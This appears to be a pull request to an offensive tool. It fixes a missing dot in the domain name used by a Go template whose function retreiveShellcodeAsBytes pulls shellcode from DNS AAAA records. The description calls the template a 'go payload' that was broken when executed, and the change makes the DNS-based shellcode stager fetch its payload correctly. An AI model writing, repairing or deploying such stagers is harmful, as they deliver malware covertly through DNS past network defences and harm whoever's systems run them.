### PR TITLE
Update client-ipv6-generic.go

### DIFF
--- a/templates/client-ipv6-generic.go
+++ b/templates/client-ipv6-generic.go
@@ -82,7 +82,7 @@ func retreiveShellcodeAsBytes() []byte {
 	// This will increment through the AAAA records until it cannot find any addiitonal records
 	for {
 		dnsMessage := new(dns.Msg)
-    dnsMessage.SetQuestion(dns.Fqdn("{PREFIX}"+strconv.Itoa(i)+"{DOMAIN}"), dns.TypeAAAA)
+    dnsMessage.SetQuestion(dns.Fqdn("{PREFIX}"+strconv.Itoa(i)+".{DOMAIN}"), dns.TypeAAAA)
 		dnsMessage.RecursionDesired = true
 		dnsResponse, _, _ := dnsClient.Exchange(dnsMessage, net.JoinHostPort(dnsConfig.Servers[0], dnsConfig.Port))
 


### PR DESCRIPTION
Fix go payload broken when executed.
Adding dot-sign (.) before domain.

Example

Original template will be like this.
`cloud-srv-0test.mydnsserver.live`

Fixed template shoud be like this.
`cloud-srv-0.test.mydnsserver.live`